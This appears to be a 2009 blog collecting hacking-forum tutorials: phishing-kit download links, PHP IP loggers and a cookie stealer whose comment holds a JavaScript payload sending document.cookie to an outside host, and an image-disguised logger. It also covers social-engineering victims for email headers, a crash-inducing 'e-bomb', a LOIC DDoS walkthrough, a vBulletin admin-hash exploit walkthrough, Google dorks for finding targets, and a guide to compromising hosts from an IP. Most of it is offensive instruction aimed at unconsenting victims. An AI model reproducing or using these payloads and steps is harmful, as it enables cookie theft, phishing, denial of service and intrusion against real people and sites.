Holly Donuts

Phisher download

2009-01-03T19:57:00.000-08:00

Other Phishing Links, You can download it easily.
http://www.4shared.com/file/56357454/d47ae4cc/Phisher_Maker.html

http://www.4shared.com/file/72556629/3e817dce/Automatic_RapidShare_Phisher_Setup.html

http://www.4shared.com/file/65254674/83463315/Yahoo_Phisher.html

http://www.4shared.com/file/56357966/19814570/Great_Site_Phishers.html

http://www.4shared.com/file/77678911/5e989858/Phisher-Help.html

Ways to get an IP address

2009-01-03T07:10:00.000-08:00

Ways to get an IP address (tut with pics)
Ok after the whole TRH situation alot of my tutorials got deleted..which I'm pissed about...

But nothing I can do...

So first is the easiest...

=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Get an IP way:
1.

Description: Make a fake server(well a real one but still) and put a simple IP logger in php for the index...

You will need: Notepad(or a simple text editor), a brain, and a php server

Where to get supplies: Mostlikely on your computer already, you should have one already, register for one at http://phpnet.us

Ok here is a simple IP logger
Code:

$ip = getenv(REMOTE_ADDR);
$agent = getenv(HTTP_USER_AGENT);
$refer = getenv(HTTP_REFERER);
$date = date("l d F H:i:s");
$fp = fopen("iplog.txt", "a");
fputs($fp, "\nIP: $ip - User Info: $agent $refer DATE: $date\n\n");
fwrite($fp, "====================================================\n\n");
fclose($fp);

?>

I personally prefer this way though (I coded this by hand you can take it if you want)

Code:

$cookie = $HTTP_GET_VARS["cookie"];
$ip = getenv(REMOTE_ADDR);
$agent = getenv(HTTP_USER_AGENT);
$refer = getenv(HTTP_REFERER);
$date = date("l d F H:i:s");
if ($ip != "xx.xxx.xx.xxx") {
$fp = fopen("iplog.txt", "a");
fwrite($fp, $cookie . "\n\n");
fputs($fp, "\nIP: $ip - User Info: $agent $refer DATE: $date\n\n");
fwrite($fp, "====================================================\n\n");
fclose($fp);
}
echo "Sorry server down... Come back later =]";

/*

METHODS

OR

"javascript:document.location='http://d1c.phpnet.us/index.php?cookie='+document.cookie;"

*/
?>

But what you do it replace xx.xxx.xx.xxx with your IP so you don't accidentally log yourself and if someone stumbles on it it wont show your IP

It is also a cookie steal which can be implemented through javascript, xxs, and yeah...(The methods are in the code in comments)

=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Get an IP way:
2.

Description: Make a fake server(well a real one but still) and put a jpeg headers in it and put it on websites...

You will need: Notepad(or a simple text editor), a brain, and a php server

Where to get supplies: Mostlikely on your computer already, you should have one already, register for one at http://phpnet.us

Ok to do this on it is the same as above but with this you can put it on myspaces... forums and anything that allows for remote pictures...

First you need the code...

Code:

$ip = getenv(REMOTE_ADDR);

$agent = getenv(HTTP_USER_AGENT);

$refer = getenv(HTTP_REFERER);

$date = date("l d F H:i:s");

$fp = fopen("iplog

.txt", "a");

fputs($fp, "IP: $ip - User Info: $agent $refer DATE: $date\n\n");

fclose($fp);

$img_number = imagecreate(10,10);

$backcolor = imagecolorallocate($img_number,0,0,0);

$textcolor = imagecolorallocate($img_number,0,0,0);

imagefill($img_number,0,0,$backcolor);

$number = "Oh Hia";

Imagestring($img_number,10,5,5,$number,$textcolor);

header("Content-type: image/jpeg");

imagejpeg($img_number);

?>

now basically this will just appear as a box.. like this one...

[Image: image.php]

and to use it just treat it like an image file

Example
Code:

Well this is all I can do for this tutorial right now... but I will add on to it...(Leaving)

I will finish it tonight if I'm not busy... Enjoy

NEW ADDITION!!!
=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Get an IP way:
3.

Description: Grab headers from Yahoo email

You will need: A yahoo email account, the internets(or a series of tubes), and a brain

Where to get supplies: http://Yahoo.com, buy an ISP...I have no idea how you are reading this if you don't, and you should have on by default...

Ok for starters you need to social engineer your victim to send you an email...

Example;
Code:
"Hey John Doe,

I just got this new email account can you send me a message is is kind of acting up...

Ok once you get the email... Open it...
Now on the bottom left you will see...

[Image: 1-5.jpg]

Click on view headers...
::: NOTE :::
To view headers you need to be in classic mode
[thanks Right_Hand_Man2]
::::::

and at the top of the page you should see...

[Image: 3-6.jpg]

You're Victim's IP will be in the 'Received' Row

Really simple I don't know how well this will work on other email clients... If it does feel free to post about it...

NEW ADDITION!!!
=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Get an IP way:
4.

Description: Grab IPs through IM's

You will need: An Instant messaging Client, brain, and WPE Pro

Where to get supplies: http://www.pidgin.im/ (Universal IM client Liniux and Windows), You should have it by default, http://wpepro.net/index.php?categoryid=9

Ok here is the basics of WPE Pro (Tutorial stolen from http://wpepro.net/forums/index.php?showtopic=145)

Code:
WPE PRO MFC Application - Winsock Packet Editor Pro 0.9a

This is a TCP/IP Packet Sniffer *With Virus Capabilities Mistaken For A Trojan*

1. Disable Anti-Virus (Because these days security can detect Wpe)
2. Open WPE PRO.exe (WpeSpy.dll Must be in same folder)
3. Target The Process You Wish To Hack/Sniff.

In Most Cases:
Iexplore.exe
Firefox.exe
Or Game Process.

Make filters if needed, I rarely use them.
Press the Record button (Looks like this for those who cant see whatâ€™s n front of them Its a black arrow top left)
Stop when the event you are waiting for happens.

Look through the bottom packets that appear until you find what you need. (also look through them all, because you might find something you would find to come in handy later.)

Right click to see a menu appear.
Send: A new window will appear allowing you to see the IP of the server your connected to.
And will also allow you to view the port and edit & send the packet again.

Add to send list: Ads the packet to the send list, To view this list go to bottom left hand corner & click the tab "Filter/Send" (send)
In hear you can also save packets & open previously saved packets.

Set send list with socket id: This speaks for its self, It adds the port that the packet was received from.
This way you can send saved packets in the send list, Without having to add a port manually.

Thatâ€™s all for this beginner tutorial have fun.

WPE Files After Ending Process:
C:\Documents and Settings\%User%\Cookies\%User%@wpepro[1]
C:\Documents and Settings\%User%\Recent\WPE PRO *Shorcut to* C:\WINDOWS\WPE PRO.INI
C:\WINDOWS\Prefetch\WPE PRO.EXE-2CA09F82.pf

Also makes a folder called $R something a long name and makes a copy of its self and the .dll
And also in: C:\System Volume Information\

Example:
C:\system Volume Information\_restore{202550A8-7A33-4BCA-9586-051D24DDBF8F}\RP27\A0012559.exe
Trojan horse Generic2.MBC

Ok so that was the basics...

but here is a video on how to use it to grab IM IPs...

http://www.youtube.com/results?search_qu...wpe+pro+tu
(Most of the videos should help)

=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Get an IP way:
5.

Description: Grab IPs through IM's

You will need: pidgin, brain

Where to get supplies: http://www.pidgin.im/ (Universal IM client Liniux and Windows), You should have it by default

Ok this one is pretty simple...

With everything pidgin sends a file through an IM client..it Direct connects and displays the receivers IP

Yeah..not that complicated it even does it with image sharing haha...

=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Get an IP way:
6.

Description: Grab IPs through IM's

You will need: An Instant messaging Client, brain, and command prompt

Where to get supplies: http://www.pidgin.im/ (Universal IM client Liniux and Windows) Or MSN, You should have it by default

Watch this video...

http://www.youtube.com/watch?v=jgjeujCEyJU

Easy...

Code:
netstat -a

OR

netstat

There are alot of netstat versions..which ever you like better

Making a E-BOMB

2009-01-03T06:32:00.000-08:00

I will tell you how to make a e-bomb....
An e-bomb is a program that opens windows again and again until the victims comp. crashes....

Open notepad.
then type the following.

open bomb.exe

then save it as bomb.bat
then download this

http://www.abyssmedia.com/downloads/quickbfc.exe

then convert the bomb.bat file into a exe

That is your e-bomb....
Enjoy!!!!!!!!!! [but dont open it]!!!

How to hide files in a jpg

2009-01-03T06:24:00.002-08:00

Set up:
1. Must have a .zip or .rar compressor.
2. Willingness to learn.

Steps:
1. Save the picture of choice to your desktop.
2. Make a new .rar or .zip folder on your desktop.
3. Add the files you want to hide into the .zip or .rar
4. Click start menu, run, cmd.
5. In Command Prompt type cd "desktop" with the quotation marks.
6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg
( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg)
7. Now there should be the outputed file name with a .jpg extension on the desktop.
( Do not close Command Prompt just yet )
8. Double click it to open the picture and check it out.
9. When your done looking, and want to view the hidden files
Type: ren outputfilename.jpg outputfilename.rar or zip
Now you're done!
A quick info-fact:
With this technique of hiding files in a jpg you can send this to anyone and they just have to rename the file extension to .zip or .rar.
With this technique the Al-Qaeda operatives were able to send info to others secretively.

Taking Down A Website with DDoS

2009-01-03T06:24:00.001-08:00

Taking Down A Website:)..
i was searching around the web the other day.. and i found this:
Taking Down Websites
In this tutorial I will show you how to take down websites via DDoS. For this tutorial we will be using one of the most effective and one of the least known tools called "Low Orbit Ion Cannon". Created by Anonymous members from 4chan.org, this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds, and try not to go for impossible targets (like Google, Myspace,Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.

Prerequisites: Download LOIC (Low Orbit Ion Cannon). Open up LOIC.

Step 1: Type the target URL in the URL box.

Step 2: Click lock on.

Step 3: Change the threads to 9001 for maximum efficiency.

Step 4: Click the big button "IMMA FIRIN MAH LAZAR!"

Feel free to tweak around with these settings and play around with the program to get the best performance. Then minimize and go do whatever you need to do, the program will take care of the rest!

DOWNLOAD HERE http://rapidshare.com/files/104926676/LOIC.exe

Hacking Vbulletin Forums Version 3.6.1

2009-01-03T06:05:00.001-08:00

Hacking Vbulletin Forums Version 3.6.1 - [TUTORIAL!]
Hello everyone, Salazarr here. Today i will teach you how to hack a Vbulletin forum, Version 3.6.1.

-1) Start off with downloading Active Perl: http://www.activestate.com/store/downloa...d58c2648ca

2) Here, Is the exploit, remember to open it in notepad, and save it as: whatever.pl - basicly, whatever you want the name to be .pl
Also Remember to change the text document, to all files. One last thing, save it in C:\perl\bin

3) Here is the actual exploit: http://www.plunder.com/Vbulletin-3-6-1-E...157464.htm

4) Now go find your victim, google: "Powered by Vbulletin 3.6.1"
- You should see a bunch!

5) open cmd, and type: cd c:\perl\bin
this opens perl from cmd

6) now type: yourexploitname.pl
this will open the exploit from cmd

7) next type: yourexploirname.pl your victims forum.com / (id number)

8) you should see the hash but here i will explain how you can find the id number, first go to your victims forum, and click on view leaders, click on an admin, on top you should see: u=somerandomnumbers

9) if you change the random number to 1 you should get the admin id.

10) once you got the hash go to: http://www.passcracking.com - and insert the hash there, wait for a few days and you get the pass for the admin!
from hackforums

How to find out an IP address (using a webspace)

2009-01-03T06:02:00.000-08:00

[TUT] How to find out an IP address (using a webspace)
Hi,

I want to show you how to create an IP Logger, using a webspace and a PHP-file.

1. Looking for a good webspace!
At first you have to look for good webspaces. If you already have one, you can skip this part. You can buy a webspace or you can get a webspace free, too. Just use Google. If you have found a webspace, just register and login.

2. Getting the PHP-file!
It's easy. At first you have to open Notepad. Then you have to copy this
in your file:

Quote:

IP LOGGER ( You have to Change That!)

It's up to you! You can give some informations etc...
$ip = $REMOTE_ADDR;
$date = date("Y m d");
$time = date("h:i:s A");

$new_file = fopen("YOURFILE.txt", a);
fwrite($new_file, "$ip - $date - $time");
fclose($new_file);
?>

Save this file as index.php. Then you have to copy this file to your webspace. ( At first you have to configurate your webspace, but I don't know which one you use, so I can't mention this step in this TUT...)
You named this file index.php , so if someone enters your website, he'll be linked to YOURSITE.com/index.php . The script will create a new file, you can choose the name by changing the script a little bit. You should rename the .txt file, so it isn't too easy to find out where your log was saved. Maybe you can use an md5 generator to make an secure file.

3. Your website!
Your IP Logger works, but you have to style your website. It looks better and your victim will not ask you thousands of questions.
Maybe you can place YouTube Vids on it - it's up to you!

4. Send the link to your victim!
Just give your victim your link. When he enters it, the logger will immediatly save his IP into the .txt file. You can look up your log, if you just go to the directory where you saved it and open your .txt file.

I hope I can help you with this TUT. Sorry for my bad English.
But keep in mind that some of the webspaces have already an IP Logger.
from hackfourms

How to hack with a ip address

2009-01-03T05:51:00.000-08:00

Tutorial: How to hack with a ip address
So say somehow somewhere we ended up choosing a target to start wreaking havoc upon. All we need is an IP Address. Theres plenty of papers out there that go into how to obtain an IP Address from the preferred mark of your choice. So I'm not going to go into that subject. Alright so say we got the targets IP Address finally. What do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.

1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.

Example 1:
Idlescan using Zombie (192.150.13.111:80); Class: Incremental
Interesting ports on 208.225.90.120:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
135/tcp open loc-srv
443/tcp open https 1027/tcp open IIS
1030/tcp open iad1
2306/tcp open unknown
5631/tcp open pcanywheredata
7937/tcp open unknown
7938/tcp open unknown
36890/tcp open unknown

In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc...) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we dont even know what type of software or what operating system that this system is running.

2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences.

So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons and many of you havent even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.
So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25' This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information youve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25.

220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400

Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8' Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Bannners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples email. Well now back to the task at handu. Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.securityfocus.com is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.

At SecurityFocus you can search through vendor and whatnot to try and find your peice of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window thats currently open was opened as root. The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a fucking jerk, however I dont recommend that. Maybe leave a text file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.

There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasnt the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the victim will enter http://www.bank.com and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really http://www.bank.com. You need to have a small script set up so it will automatiically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the victim doenst give it a second thought and will simply try again later.
__________________________________________________ _______o_________

So as a summary of how to 0Wn a box when you only have an IP Address
Method Works On BOTH *Nix and Windoze

****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.****

- Port Scan The Address And Record Open Ports
- Telnet To Open Ports To Identify Software Running On Ports

3) netcat - Network swiss army knife. Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports

- Record Banners And Take Note Of The Application Running and The Version Number
- Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any vulnerabilities then search google.
- Make a copy of some Proof-Of-Concept code for the vulnerability.

*Read the documentation if there is any, for the proof-of-concept code you will be using for your exploit*

- Run The Exploit Against The Victim.
- Reap The Cheap-Sh0t Ownage
__________________________________________________ _______________
**This document does not go into covering your tracks. If you dare try any of this stuff on a box you dont have consent to hack on, They will simply look at the logs and see your IP Address and then go straight to your ISP. Once you get more 1337 you get to learn how to get away with the nasty deeds. This is what the majority of kode-kiddies do when they perform attacks. The key is to enumerate all the info you can from the machine, the more info you have on the system the better. User accounts can also be enumerated. Once you have a list of account names, you may then proceed to brute-force or perform a cryptanalysis attack to gain control of the account. Then you must work on privilage escalation. Users are not Admins/Root**

How To Use Google & Optimize Google Search Results

2009-01-03T05:45:00.000-08:00

TuT]How To Use Google & Optimize Google Search Results...
Google is the best search engine.
We can obtain many information from Google.
Many people in this forum need to learn how to use Google for 100%.
It is great to know how to use Google.

If we know the way to search Google,we can get a lot of valuable information.
Some of the information maybe can assist us to hack.
We can search for vulnerability sites to hack.

All the command here must be type in Google search bar.
All without quotes.
Hehe

Tutorial start from here:

1.intitle:
--For example, "intitle:login password".The title of all the search results will contain login password.

2.inurl or allinurl:
--For example, "allinurl:admin/login.asp.The urls of all the search results will all contain admin/login.asp.This command is good to find vulnerability sites.I prefer to use allinurl.

3.filetype:
--For example, "filetype:doc site:gov".This command will look for .doc at .gov sites.

4.related:
--For example, "related:www.friendster.com".This command will list out all the sites that are similar friendster.

5.intext:
--For example, "intext:hacking".This command will search for words in all the websites.

6.index of /:
--For example, "index of / admin".This command can let us to see something in index format.

Some example to find valuable sites to be attacked:
-allinurl:admin filetype:txt
-allinurl:admin filetype:db
-allinurl:admin filetype:cfg
-allinurl:file_upload.php
-allinurl:admin/login.asp

This is my tutorial for you.
Hope you all can get some useful information from this tutorial.

Type in the command from this tutorial in Google search bar for more understanding.

Thanks...
from hackforums

How to Hack Websites & Servers from Scratch!!! Step by Step Tutorial for Beginners

2009-01-03T05:30:00.000-08:00

I'm going to provide the common methodology that is followed when hacking a machine/network/server. This tutorial will give you a good understanding & an overview about professional penetration test in a black box (attacker) point of view. It is designed to give you the idea on how an attacker can break into your system, what am gonna say will increase your awareness & will open the door for you to go out & educate yourself easily. I gathered these info from various sources and tutorials, i have changed many stuff, clarified many parts, gave some references, and put many information together. I'm still a learner & on the way to my goal. However, this won't prevent from teaching others what i have learned so far & don't worry i'm not going to provide you any info that i'm not sure about yet. It is not the best tutorial out there, but at least it is a good starter. I will speak in a hacker (attacker or blackbox) point of view. I write this tutorial for educational purposes only.

Since i'm not a native speaker, expect to see lots of grammar and spelling mistakes.

Before you hack a system, you must decide what is your goal. Are you hacking to put the system down, gaining sensitive data, breaking into the system and taking the 'root' access, screwing up the system by formatting everything in it, discover vulns & see how you can exploit them, etc ... The point is you have to decide the goal.

The most common goals are:

1. breaking into the system & taking the admin privileges.
2. gaining sensitive data, such as credit cards, identification theft, etc.

You should have all the tools ready before you start taking the steps of hacking. There is a *nix version called backtrack. It is an OS that comes various set of security tools that helps you hacking systems (doing penetration test).

You should set the steps (methodology) that you have to take in your journey. There is a common methodology followed
by hackers i will mention it below. However, you can create your own methodology if you know what u r doing.

Common steps to be taken for hacking a system:

1. Reconnaissance(footprinting).
2. Scanning.
3. Ports & Services Enumeration.
4. Vulnerability Assessment.
5. Vulnerability Exploitation.
6. Penetration and Access.
7. Privilege Escalation & owning the box.
8. Erase tracks.
9. Maintaining access.

The above methodology can change referring to your goals. Feel free m8!

Before you break into a system, you have to collect as much info as you can. You have to study your target well before you hack. This step is called Reconnaissance. Reconnaissance is achieved by you using techniques & tools that undetectable by a target. You are gathering your target info that is publicly published, e.g. browse your target website & if they are looking for a SQL employee and Windows server admin, then you get a hint that they are running Windows Server & do SQL's, this is called a "passive" action. Lets an example of active action! Example of active action, call the company to obtain some info, visit the company, email employees to get some info, go to the target website & read its source code. In other words, passive action means you gather info in non-intrusive manner. Active action is a step further, such as talking to the company as you are a customer, things like that. It is not really important to know what action is passive & what is active, the main goal here to gather info! Simple ha? Good, let me go deeper little bit.

In passive reconnaissance, there is 0 chance of getting caught ;-), as you only target publicly available info to give you the feel on how your target look like. Type of info you can gather through passive recon. are, names, phones numbers, location address, partner networks, and many more. This can aid you when you want to do some social engineering! Hence, sometimes you can get some non-public info is revealed when you do passive reconnaissance. There are several tools helps you to do passive reconnaissance, such as whois (who is). Whois helps you obtain extensive info, such as names, domains of the target, etc. Other great tools are, Sam Spad, domaintools, and google(can reveal lots of target subdomians & many more).

To know what is whois briefly, visit http://www.hackforums.net/showthread.php?tid=41568

Active reconnaissance goes beyond the passive nature, such as communicating with target without being caught, such as scanning. Anything not discovered in IDS(Intrusion Detection System) is considered active. You have to think of ways to extract info of the company in a normal way, public way by going deeper little bit than passive recon. e.g. you can go to the physical location do some social engineering, email staff, communicate with employees based on info's you have got in passive recons. Things like that!

Example of some techniques for active reconnaissance, such as banner grabbing, view company's public website source code and directory structure, social engineering, shoulder surfing, etc.

What the heck is banner grabbing?
You let the server sends you a block of information that tells you OS version of your target system & various association with it
Banner tells OS version n various association. Anything listens on a "port" can determine the operating system (OS) "the port" is running on, this called fingerprinting. In other words, fingerprinting is the process of determining the operating system (OS) or applications used by a remote target.

Learn more about banner grabbing:
http://www.net-square.com/httprint/httprint_paper.html

Can you give a brief example of Social Engineering?
For example, you try to know where IT admin goes after business hours, then start go to the place he goes & build a relationship , start making a friend relationship to extract more info slowely but surely, things like that! you know what i mean.

What is shoulder surfing?
Simply, stands behind a person shoulder and see what the guy is doing & typing on keyboard. This can happen in wireless network area where everyone is using a laptop in public areas.

In summary, reconnaissance is one of the most important steps in hacking. The main concept is to gather all info that publicly available or easy obtainable. Info that we gather will help us in social engineering and research purpose swhich will lead you to very critical info about the system. It starts by obtaining names, phones, emails, IP range, domain structure, and so on.

let me show you how banner grabbing is done, telnet on your target server on port 80 as following, go to command line or terminal and type

telnet xx.xxx.xxx.xxx 80

Now connection is established, that stupid server thinks you are web browser connected to it, it waits you to enter commands so the server can you give you info about your request. In this situation, you have to write a command that says "Hey you web server, give me a content of sucn and such website". However, we do not really want to visit the website through telnet, do you? You can just go to web browser & request the website from there. Our purpose here is to freak the server out enough, so it spits back a code that says, hey! this doesn't work but here is some info that might help you do some trouble shooting. This technique allows you to finger print various component of the target system.

Note: instead telnet xxx.xx.xxx.xx 80, you can do nc xxx.xx.xxx.xxx 80! Same thing ... nc stands for netcat ... xx.xxx.xx.xxx represents IP address of the target system.

After you do telnet xxx.xx.xxx.xxx 80, the remote sever will wait you to enter a command. Type this:

HEAD / HTTP/1.0

Then you will get a reply looks similar to:-

HTTP/1.1 200 OK
Date: Mon, 16 Jun 2003 02:53:29 GMT
Server: Apache/1.3.3 (Unix) (Red Hat/Linux)
Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT
ETag: "1813-49b-361b4df6"
Accept-Ranges: bytes
Content-Length: 1179
Connection: close
Content-Type: text/html

So the header response brought back some important info that says, the server runs: Apache/1.3.23 in UNIX OS for Red Hat distribution of Linux.

OR you might get header that looks similar to the following:

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Expires: Tue, 17 Jun 2003 01:41:33 GMT
Date: Mon, 16 Jun 2003 01:41:33 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 28 May 2003 15:32:21 GMT
ETag: "b0aac0542e25c31:89d"
Content-Length: 7369

It means, the server runs: Microsoft-IIS/5.0 in Win 2000 or Win 2003 (we don't the Windows version yet).

OR you might get header that looks similar to the following:

Date: Thu, 04 Dec 2008 02:18:46 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.8 mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8b
Last-Modified: Thu, 10 Jul 2008 23:34:28 GMT
ETag: "c9865b-d91-48769c84"
Accept-Ranges: bytes
Content-Length: 3473
Connection: close
Content-Type: text/html

It means, the server runs: Apache/1.3.41 in UNIX box, running PHP/4.4.8

Ok, you get it now?

lets say our target got the following version: the server runs: Apache/1.3.41 in UNIX box, running PHP/4.4.8

At this point if you know any vulnerability for this particular OS or this particular Apache or PHP. You can start doing the exploitation process ;-) ...

Another example, use program called sam-spade which gives you alot of the info about your target. The target does not know actually what we are doing against their server, since they haven't seen anything been triggered by IDS or Firewall.

*What is the difference between IDS & Firewall?
An IDS (Intrusion Detection System) may only detect and warn you of a violation of your privacy. Although most block major attacks, some probes or other attacks may just be noted and allowed through. There's also an evolution of the IDS called an IPS (Intrusion Prevention System) that watches for the same things an IDS does, but instead of just alerting, it blocks the traffic.

A good firewall will block almost all attacks unless specified otherwise or designed otherwise. The only problem is, the firewall might not warn you of the attacks and may just block them.

It may be a good idea to have both an IDS and a Firewall, because the IDS will warn you and then the firewall will block the attack. Over the years, firewalls got more complex and added more features. One of these features is actually IDS - today you can have a firewall that already has ID(Firewall/IDS's are combined into one internet security program).

Learn more about banner grabbing:
http://www.net-square.com/httprint/httprint_paper.html

To learn how to do through Google, you need like the following book:
http://www.amazon.com/exec/obidos/ASIN/1.../ref=nosim

Note: the book in amazon is just an example for you to give you an idea of what kind of book you should be looking for - if you are interested.

Alright, now you at least have an idea of what reconnaissance is! lets talk about scanning...

When you scan your target's network, you actually start touching the system. Scanning a network determines whats in there, scanning network gives you the feel how is your target network is laid out such as if there are multiple subnets, which hosts are alive, check ports, see if system is alive, discover available hosts & get info about the discovered hosts. There are thousands of tools can be used to scan networks! Scanning a network can easily get picked up by IDS. Anyhow, no one will pay attention except if you do it over and over because scans happens on such a regular basis on the internet. Therefore, people who read the logs, i means the webmaster won't really pay attention to every single scan occurs, so you don't have to worry alot. There are ways to avoid being picked up by IDS :-). After you finish scanning, you will gain a list of network nodes that exists there.

"Node" is an active electronic device that is attached to a network, and is capable of sending, receiving, or forwarding information over a communications channel. If you want to learn more,google it or visit http://en.wikipedia.org/wiki/Node_(networking) ...

Ok now we want to discover live hosts via scanning. This is the first action taken against your target network network. Depending on method of scanning you use, you can be detected by IDS. Most admins will ignore detections because it happens alot unless something abnormal happens.

There are various scanner tools, e.g. nmap, superscan, and many more. There are various scan methods, some are stealthy, others are not.

Before i talk about various scanning methods, let me explain to you about TCP connections basics. When you scan your target using TCP communication, there are six TCP flags can be utilized during packet transmission(packets get transmitted during scanning process). A flag will indicate whether the sent packets are syn, ack, fin, urg, psh, or rst packets. These packets sets you in a position on how you want to communicate with the remote host. You can get different info depending on the flag you choose for the scanning.

TCP establishes three handshakes, syn, syn-ack, ack. What are they?
When you scan your target using TCP communication, you send a syn packet(syn request), and then target sends you back an ack packet with syn packet. Now, you send an ack packet to the target. So now both machines establish the connection well, like they have made a well established tunnel for a proper guaranteed communication without losing any packets during communicating with each other. A hacker can get caught easily if he uses this method to hack other systems illegally.

Hackers use non-standard combination of these six flags, which gives them info that are not normally available to the public.

Have you heard about syn flood?
syn flood is done by utilizing three handshake by sending "syn" request to the target, so the target receives a syn request and send an a syn-ack back to the originator(you). You ignore the target syn-ack request - when you ignore it, then the three handshakes is not completed, this is called half open TCP connection - In theory, when the target sends you syn-ack, the target allocates some RAM on its machine.

The amount of RAM on the target machine must be open until it gets response (ack packet) back from you because till now only two handshake has been made,so the TCP connection process is not completed yet. However, there is always a time limit for the RAM to be opened, so if 30 secs passed by & the target did not get the ack from you, the connection will abort(failed TCP handshake - timeout) & RAM will be deallocated.

The idea here is to send hell alot of packets in few secs so in 30 secs, you can send 40 million packets(lets say one packet size is 1kb) which is heavy on the RAM since the RAM might not have enough memory to carry 40 million packets. Therefore, you force the target to make half open TCP connection attempts, so definitely the target machine will stop responding to legitimate request. In other words, if you send 40 million syn requests to that remote host, it's going to allocate a hell of a lot of ram for those requests. After a while, it's going to eat up all of the ram. Thus, target system goes down. This is called syn flood attack.

In short, syn flood attack makes the system (i.e. the IP stack or kernel) chokes on the memory allocations (or simply runs out of memory) or the target application (i.e. web server) chokes on the processing load. You got it? Or not yet?! Syn flood is an old technique i just mentioned it here for illustration purposes.

General Information: these days, SYN floods are used to make systems inaccessible. They have a limited number of half open connections, you use them all, and they can't accept any more SYNs. But again, modern software throws away old SYNs once the limit is reached. Note that different systems will behave differently.

If you interested in learning more about syn flood, visit
